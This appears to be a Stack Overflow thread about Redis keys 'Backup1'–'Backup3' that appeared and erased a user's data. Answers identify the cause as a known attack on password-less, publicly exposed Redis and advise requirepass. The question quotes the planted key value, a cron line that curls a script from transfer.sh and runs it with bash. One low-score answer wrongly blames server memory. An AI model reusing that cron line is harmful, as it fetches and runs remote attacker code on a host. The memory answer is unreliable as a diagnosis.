# My Redis auto generated keys

Tags: ubuntu, redis

I don't know what's exactly happen with my Redis version 4.0.9.

I'm running an application and using Redis to store my database.

But, then Redis auto create 3 new keys: "Backup1", "Backup2", "Backup3" and delete all of my data.
Here is the screenshot of my redis: https://snag.gy/cyUZrg.jpg

By the way, the value of "Backup1" key is:

```
"\t\n*/2 * * * * curl -s https://transfer.sh/14lJBL/tmp.OiYASvlZ0v > .cmd && bash .cmd\n\t"
```

Thank you so much.

**Update:**

I found that this is the Persistence feature of Redis. I have tried to set `save ""` and `appendonly no` but it seems not work. [my Redis persistence config](https://snag.gy/RC5Asx.jpg).

Thanks, guys.

Comment: can you clear more what did you find?

Answer (score 25):

There is not issue with redis 4.0.9. 
Your redis machine hacked. Hacker removed all your data from redis-server.

Comment: seems like a strange answer, couldn't this be an answer for just about any question on SO when somebody can't find data?

Comment: No, that's actually the correct one. It is a known exploit for publicly-open Redis servers (i.e. configured **NOT** to use password authentication and [because of the version] had they protected-mode turned off.)

Comment: Check the backup file name and path, and check your cron jobs, you should see it there. You can probably also see it in `top` as the main CPU user of your machine.

Comment: Thank you guys, but it not because of the hacker. My redis is running in the correct way. I found that redis autosave my data and create a backup file, follow this image: [image link](https://snag.gy/50Lem6.jpg). I have tried to disable this feature, but it does not work.

Comment: @ThanhThaiNguyen The fact that it saves is part of the problem. `cat` the dump file and look at its location. This is the exploit the hacker uses.

Comment: I'm running Redis in a private cloud for staging and I got it lol, anyway it's related to some of a policy from Redis for publicly open instances.

Comment: @YahiaBat: [citation needed]

Answer (score 3):

You are victim of the KINGSING malware. What it will do:

```
flushall
SET backup1 ...
SET backup2 ...
```

You can actually see the content of the script that will be downloaded.
What I don't know is how the cron job will be executed, but if it does, it will download the script and run it. Which in turn will disable the firewall, SeLinux and a bunch of other programs.
It will also run a crypto miner.

The `flushall` command will delete all the data in your DB, which is why your keys will disappear. To prevent this, just set a password

in redis.conf:

```
requirepass MY_SUPER_SECURE_PASSWORD
```

You can also have an ACL file if you want something more granular.

Answer (score -4):

I know it's late, but because I found the solution, decided to share it here.
My problem was solved after if increased memory of my server.